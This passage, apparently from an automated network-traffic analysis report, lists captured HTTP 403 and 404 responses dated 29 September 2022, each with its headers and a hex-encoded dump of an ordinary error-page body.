73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 37 38 2e 31 35 39 2e 39 37 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 78.159.97.210 Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 13:01:36 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=81X-Content-Type-Options: nosniffX-Frame-Options: sameoriginUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingKeep-Alive: timeout=4, max=500Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:01:41 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:01:48 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:01:57 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:02:04 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 29 Sep 2022 13:02:06 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 13:02:08 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=81X-Content-Type-Options: nosniffX-Frame-Options: sameoriginUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingKeep-Alive: timeout=4, max=500Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74
